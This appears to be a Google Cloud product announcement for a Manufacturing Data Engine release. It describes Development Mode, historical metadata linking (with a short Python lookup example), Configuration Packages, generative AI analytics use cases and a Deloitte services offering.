Building on our progress, this latest MDE release completes our IT/OT integration journey and introduces powerful new features: Development Mode, historical metadata linking, and Configuration Packages. Together, they enable better grounding of IT and OT data to drive faster AI outcomes. These advancements empower manufacturers to unlock deeper insights and achieve more with their data.
Accelerating innovation with Development Mode: With Development Mode, manufacturers have more flexibility to delete configuration objects, which is particularly valuable in development and proof-of-concept (PoC) environments. This helps accelerate the innovation cycle by making it easier and less time-consuming to experiment with new data models.
Ingest time-shifted data with historical metadata linking: This feature uses event-time to map the correct metadata instances, which are extended with a “valid from” timestamp. This means manufacturers can load historical data at a later date and MDE will insert it into the right place in the timeline, ensuring an accurate historical representation of your data. This is helpful for manufacturers who need to load data out of order, and in turn makes it easier to analyze historical trends and patterns to optimize operations (a minimal lookup sketch follows this list).
Streamlining IT and OT with Configuration Packages: MDE Configuration Packages provide a powerful new way to merge factory floor data with your core enterprise systems by creating and packaging industry and use case-specific MDE configurations. Manufacturers can bridge the IT and OT gap, packaging their OT data from MDE in predictable schemas for integration within Cortex Framework alongside supply chain, marketing, finance, and sustainability data.
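To make the historical metadata linking behavior concrete, here is a minimal lookup sketch of the event-time semantics described above. The data shapes are illustrative assumptions, not MDE APIs: each metadata instance carries a "valid from" timestamp, and a late-arriving record is joined to whichever instance was valid at its event time.

# valid_from_lookup.py - event-time metadata resolution, illustrative only.
import bisect
from datetime import datetime

# metadata versions for one signal, sorted by their "valid from" timestamp
versions = [
    (datetime(2024, 1, 1), {"units": "psi"}),
    (datetime(2024, 6, 1), {"units": "bar"}),  # e.g., sensor recalibrated mid-year
]
valid_from = [v[0] for v in versions]

def metadata_at(event_time: datetime):
    i = bisect.bisect_right(valid_from, event_time) - 1
    return versions[i][1] if i >= 0 else None  # None: before the first version

print(metadata_at(datetime(2024, 3, 15)))  # -> {'units': 'psi'}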
These powerful new features, along with faster IT and OT data integration, unlock a spectrum of transformative use cases.
For example, manufacturers can optimize production schedules based on real-time demand signals from their marketing campaigns, or accurately forecast financial impact by correlating machine performance with ERP financial data. They can enhance sustainability initiatives by analyzing energy consumption alongside production output.
Combine multimodal data from your factory with enterprise IT data for a holistic view of your operations
By contextualizing multimodal data from machines, sensors, and cameras with data from Cortex Framework, manufacturers gain a truly holistic view of their operations.
Unlocking new Gen AI use cases
Previously, manufacturers could combine OT data using MDE with Google AI services for things like faster issue resolution with ML-based anomaly detection, or flexible and scalable visual quality control.
With this release, we’re enabling even more possibilities for manufacturing intelligence by making it easier and faster to unify IT and OT data to use in grounding large language models (LLMs) for generative AI applications. Conversational Analytics lets you chat with your BigQuery data, Sheets, Looker Explores/Reports/Dashboards and more for generative analytics and insights. Imagine getting current open support cases from your customer support system, spotting an outlier, and being able to immediately ask for and trace the outlier part through to the production quality data from your factory floor to isolate the issue.
Use Conversational Analytics to get immediate, data-driven insights
By building on this latest release of MDE with Cortex Framework, in combination with Google Cloud’s AI capabilities, manufacturers can receive immediate, data-driven insights, empowering them to make smarter, faster decisions across the entire value chain.
Partner ecosystem: Driving customer success with Deloitte
We’re proud to work with a robust ecosystem of partners who are instrumental in helping our customers achieve their digital transformation goals in manufacturing.
We’re especially excited to announce that Deloitte has launched a packaged services offering for our latest MDE release, enabling customers to quickly leverage the new capabilities with services delivered by a trusted partner. Contact Deloitte to learn more, or visit their demo stand at the Google Cloud booth at Hannover Messe and at Google Cloud Next to understand how they can help you with your initiatives.
Looking ahead
Our latest release of MDE represents a significant milestone in our journey to empower manufacturers with the tools they need to thrive in the digital age. We’re committed to continuous innovation and look forward to partnering with you on your industrial transformation journey.
Stay tuned for more updates and insights from Google Cloud.
We’re excited to showcase this latest release at two major industry events:
Hannover Messe: Visit our booth to see live demonstrations of new features and learn how MDE can help you drive industrial transformation.
Google Cloud Next: Join us at the Industry Showcase (Manufacturing) Booth to explore the latest advancements in our data and AI platforms, including Manufacturing Data Engine, or join one of our Manufacturing-focused sessions.